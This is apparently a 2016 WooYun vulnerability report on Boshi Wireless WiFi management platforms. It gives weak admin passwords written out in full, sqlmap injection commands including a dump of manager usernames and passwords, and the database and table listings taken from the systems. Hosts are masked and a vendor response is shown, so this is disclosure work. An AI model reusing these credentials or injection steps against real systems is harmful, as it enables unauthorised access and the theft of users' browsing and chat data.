当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197223

漏洞标题:wifi安全之博士无线多个系统弱口令导致多处sql注入导致多个系统沦陷(可控制12254台路由器设备/一键断网)

相关厂商:深圳市梧桐世界科技股份有限公司

漏洞作者: 黑色键盘丶

提交时间:2016-04-17 09:49

修复时间:2016-06-02 09:00

公开时间:2016-06-02 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-17: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

RT

详细说明:

看了这个http://**.**.**.**/bugs/wooyun-2016-0196866 迫不及待来试试 弱口令确认好多处 但是有用的就3个平台
http://**.**.**.** admin 123456进入
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&
shopname=admin&from=admin" --dbs
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&
shopname=admin&from=admin" --dbs
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/package.php?action=add" --data "ri
ption=1&number=1&money=1&sort=1&sub=%E4%BF%9D%E5%AD%98" --dbs
http://**.**.**.** admin 123456弱口令进入
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/visitors?
order=placenum&content=11&ftime=2016-03-29&ttime=2016-03-28" --dbs
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/onlinepla
ce?order=placenum&content=111" -D monitor -T monitor_manager -C "username,passwo
rd" --dump
http://**.**.**.**/login.php  admin bswifi 肉口令
post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php" --data "hwid=11&pla
ce_name=11&place_code=111" --dbs
http://**.**.**.**/admin/index/index  admin 1234567进入
监控系统


34566.jpg


345667.jpg


可控制10000多台设备

3456.png


数据库信息

back-end DBMS: MySQL 5.0.12
available databases [33]:
[*] bsremote
[*] comiims
[*] demoiims
[*] demowifi
[*] demowifieth
[*] dx
[*] iims
[*] iimstest
[*] information_schema
[*] jxcount
[*] monitor
[*] mysql
[*] openvpn
[*] performance_schema
[*] phpinfo
[*] qscms
[*] raffle
[*] romupdate
[*] sczy_iimstest
[*] sczy_wifi
[*] sczy_wifieth
[*] smscenter
[*] ssp_bswifi
[*] tongji
[*] webbswifi
[*] wifi
[*] wifieth
[*] wifiethtest
[*] wifiptr
[*] wifitest
[*] wireless
[*] wxcms
[*] zentao


表信息

Database: comiims
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| iims_zdata_url1459872000           | 1966478 |
| iims_zdata_url_mrg                 | 1916400 |
| iims_zdata_url1459267200           | 1877330 |
| iims_zdata_url1459612800           | 1841149 |
| iims_zdata_url1460131200           | 1709826 |
| iims_zdata_url1460390400           | 1473047 |
| iims_zdata_url1460649600           | 1441890 |
| iims_zdata_url1459008000           | 898420  |
| iims_zdata_start_end_mrg           | 675019  |
| iims_zdata_start_end1460390400     | 514227  |
| iims_zdata_start_end1460649600     | 482555  |
| iims_zdata_url1460908800           | 474509  |
| iims_zdata_start_end1460131200     | 459982  |
| iims_zdata_url1458748800           | 317735  |
| iims_zdata_start_end1459872000     | 295944  |
| iims_zdata_chat_mrg                | 236362  |
| iims_zdata_chat1459267200          | 226550  |
| iims_zdata_start_end1459612800     | 221900  |
| iims_zdata_chat1460131200          | 218788  |
| iims_zdata_chat1459872000          | 206799  |
| iims_zdata_start_end1460908800     | 192461  |
| iims_zdata_chat1459612800          | 192257  |
| iims_zdata_start_end1459267200     | 180957  |
| iims_zdata_chat1460649600          | 176895  |
| iims_zdata_chat1460390400          | 175719  |
| iims_zdata_chat1459008000          | 140209  |
| iims_zdata_start_end1459008000     | 127028  |
| iims_virtual                       | 92182   |
| iims_zdata_chat1460908800          | 59466   |
| iims_zdata_chat1458748800          | 44756   |
| iims_zdata_start_end1458748800     | 30799   |
| iims_data_mac                      | 21388   |
| iims_autonym                       | 19064   |
| iims_timeout_place                 | 10702   |
| iims_zdata_search1460131200        | 10126   |
| iims_zdata_search_mrg              | 9879    |
| iims_zdata_search1459872000        | 9686    |
| iims_zdata_search1460390400        | 9100    |
| iims_zdata_search1459612800        | 8419    |
| iims_zdata_search1459267200        | 8054    |
| iims_zdata_search1460649600        | 7503    |
| iims_zdata_url1458489600           | 7090    |
| iims_zdata_action_log              | 4642    |
| iims_zdata_district_code           | 3679    |
| iims_zdata_search1459008000        | 3553    |
| iims_zdata_search1460908800        | 2376    |
| iims_zdata_search1458748800        | 1667    |
| iims_zdata_app_mrg                 | 1279    |
| iims_zdata_app1460390400           | 1213    |
| iims_zdata_history_stats_mrg       | 1198    |
| iims_zdata_url1458230400           | 1130    |
| iims_zdata_app1460131200           | 1096    |
| iims_zdata_history_stats1464710400 | 1093    |
| iims_zdata_app1460649600           | 928     |
| iims_zdata_games1459267200         | 816     |
| iims_zdata_games1459612800         | 487     |
| iims_zdata_chat1458230400          | 479     |
| iims_zdata_app1459872000           | 459     |
| iims_zdata_app1459008000           | 440     |
| iims_zdata_games1459872000         | 422     |
| iims_zdata_feifamac                | 406     |
| iims_zdata_city_code               | 383     |
| iims_zdata_weibo_mrg               | 368     |
| iims_zdata_police_code             | 363     |
| iims_zdata_chat1458489600          | 358     |
| iims_zdata_app1459267200           | 352     |
| iims_zdata_app1460908800           | 351     |
| iims_zdata_weibo1459612800         | 332     |
| iims_zdata_games1460131200         | 318     |
| iims_zdata_weibo1460649600         | 275     |
| iims_zdata_app1459612800           | 244     |
| iims_zdata_weibo1460131200         | 234     |
| iims_zdata_weibo1459872000         | 222     |
| iims_zdata_weibo1459267200         | 207     |
| iims_zdata_weibo1460390400         | 202     |
| iims_zdata_games_mrg               | 186     |
| iims_zdata_norecordplace           | 166     |
| iims_zdata_start_end1458489600     | 155     |
| iims_zdata_app1458748800           | 136     |
| iims_zdata_games1460390400         | 134     |
| iims_zdata_games1460649600         | 129     |
| iims_zdata_ftp_mrg                 | 113     |
| iims_zdata_history_stats1456761600 | 105     |
| iims_zdata_games1459008000         | 104     |
| iims_zdata_weibo1460908800         | 93      |
| iims_zdata_ftp1460649600           | 89      |
| iims_zdata_place_type              | 76      |
| iims_zdata_place_info              | 64      |
| iims_zdata_pac_info                | 61      |
| iims_zdata_games1460908800         | 57      |
| iims_zdata_ftp1460390400           | 53      |
| iims_member_menu                   | 46      |
| iims_zdata_email1459008000         | 45      |
| iims_zdata_email1460131200         | 45      |
| iims_zdata_bbs_mrg                 | 43      |
| iims_zdata_gamblings_mrg           | 42      |
| iims_zdata_gamblings1460390400     | 41      |
| iims_zdata_email1459872000         | 36      |
| iims_zdata_bbs1459612800           | 35      |
| iims_zdata_provice_code            | 35      |
| iims_zdata_bbs1460908800           | 31      |
| iims_zdata_bbs1459267200           | 29      |
| iims_zdata_ftp1460908800           | 24      |
| iims_zdata_bbs1460390400           | 18      |
| iims_zdata_email_mrg               | 17      |
| iims_zdata_email1460649600         | 15      |
| iims_zdata_search1458489600        | 14      |
| iims_zdata_bbs1459872000           | 13      |
| iims_zdata_email1460390400         | 13      |
| iims_zdata_bbs1460131200           | 12      |
| iims_zdata_bbs1460649600           | 12      |
| iims_zdata_email1459267200         | 10      |
| iims_zdata_place_netype            | 10      |
| iims_zdata_bbs1459008000           | 8       |
| iims_zdata_ftp1460131200           | 8       |
| iims_zdata_email1459612800         | 7       |
| iims_zdata_start_end1458230400     | 7       |
| iims_member                        | 5       |
| iims_member_group                  | 5       |
| iims_zdata_place_stats             | 5       |
| iims_zdata_search1458230400        | 5       |
| iims_zdata_weibo1459008000         | 5       |
| iims_brandinfo                     | 4       |
| iims_zdata_ftp1459008000           | 4       |
| iims_zdata_controll                | 2       |
| iims_zdata_controll_log            | 2       |
| iims_zdata_email1458230400         | 2       |
| iims_zdata_email1460908800         | 2       |
| iims_zdata_ftp1459267200           | 2       |
| iims_zdata_weibo1458230400         | 2       |
| iims_times                         | 1       |
| iims_zdata_app1458489600           | 1       |
| iims_zdata_area_police             | 1       |
| iims_zdata_base_info               | 1       |
| iims_zdata_bbs1458230400           | 1       |
| iims_zdata_gamblings1460649600     | 1       |
| iims_zdata_pap_info                | 1       |
| iims_zdata_setting                 | 1       |
+------------------------------------+---------+


Database: iims
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| iims_zdata_url_mrg           | 873660  |
| iims_zdata_wifi_wl1451577600 | 487731  |
| iims_zdata_wifi_wl_mrg       | 487731  |
| iims_zdata_url1452009600     | 285826  |
| iims_zdata_url1451923200     | 243968  |
| iims_zdata_chat1451577600    | 201839  |
| iims_zdata_chat_mrg          | 201839  |
| iims_zdata_url1451836800     | 180289  |
| iims_zdata_url1452096000     | 163577  |
| iims_zdata_virtual           | 150402  |
| iims_zdata_changemac         | 132227  |
| iims_zdata_feifasj           | 73020   |
| iims_zdata_history_stats     | 72769   |
| iims_zdata_action_log        | 13522   |
| iims_zdata_search1451577600  | 4211    |
| iims_zdata_search_mrg        | 4211    |
| iims_zdata_district_code     | 3679    |
| iims_zdata_games1451577600   | 2678    |
| iims_zdata_games_mrg         | 2678    |
| iims_zdata_weibo1451577600   | 1988    |
| iims_zdata_weibo_mrg         | 1988    |
| iims_zdata_app1451577600     | 620     |
| iims_zdata_app_mrg           | 620     |
| iims_zdata_city_code         | 383     |
| iims_zdata_police_code       | 363     |
| iims_zdata_email1451577600   | 258     |
| iims_zdata_email_mrg         | 258     |
| iims_zdata_ssid              | 173     |
| iims_zdata_norecordplace     | 140     |
| iims_zdata_bbs1451577600     | 69      |
| iims_zdata_bbs_mrg           | 69      |
| iims_zdata_place_info        | 65      |
| iims_zdata_pac_info          | 59      |
| iims_member                  | 53      |
| iims_member_menu             | 53      |
| iims_zdata_provice_code      | 35      |
| iims_member_group            | 18      |
| iims_zdata_pap_info          | 14      |
| iims_zdata_ap_info           | 13      |
| iims_zdata_place_type        | 13      |
| iims_zdata_place_netype      | 10      |
| iims_zdata_place_stats       | 5       |
| iims_zdata_controll          | 3       |
| iims_zdata_telnet1451577600  | 3       |
| iims_zdata_telnet_mrg        | 3       |
| iims_session                 | 1       |
| iims_site                    | 1       |
| iims_zdata_area_police       | 1       |
| iims_zdata_base_info         | 1       |
| iims_zdata_ccic              | 1       |
| iims_zdata_enroll1451577600  | 1       |
| iims_zdata_enroll_mrg        | 1       |
| iims_zdata_ftp1451577600     | 1       |
| iims_zdata_ftp_mrg           | 1       |
| iims_zdata_setting           | 1       |
+------------------------------+---------+


http://**.**.**.**/index.php 50多个账户 解密不出来 随便输入了弱口令 进入 jxdubaoli jxdubaoli

456778.png


11

567788.png


http://**.**.**.**/ 密码也解密不出来 爆破进去了 tongwang2014
tongwang2014 sucaineng 123456

111111111111.png


3333333333.png


漏洞证明:

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-18 08:58

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现。
影响的数据:中
攻击成本:低
造成影响:中
综合评级为:中,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无